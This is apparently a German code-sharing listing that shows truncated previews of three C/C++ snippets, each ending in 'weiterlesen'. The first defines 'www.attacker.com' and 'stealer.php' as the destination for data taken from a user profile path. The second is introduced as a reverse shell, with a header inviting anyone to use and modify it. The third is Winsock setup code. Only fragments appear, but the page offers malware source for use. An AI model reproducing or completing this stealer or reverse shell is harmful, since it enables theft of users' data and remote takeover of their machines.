[cpp]#include <Windows.h> #include <WinInet.h> #define HOST "www.attacker.com" #define PORT 80 #define PAGE_NAME "stealer.php" char * getProfilePath() { DWORD... weiterlesen...
/* MUTHAFUKKEN REVERSE SHELL By a32 Do whatever you want with this code. I dont give a shit. Have fun using/modding this. I had fun coding this ;D */ #include <stdio.h> #include <sy... weiterlesen...
zu verlinkende lib: ws2_32.lib unter Dev-Cpp: libws2_32.a #include <windows.h> #include <winsock2.h> #include <stdio.h> int start() { WSADATA wsa; return WSAStartup(MAKEWOR... weiterlesen...
Kommentare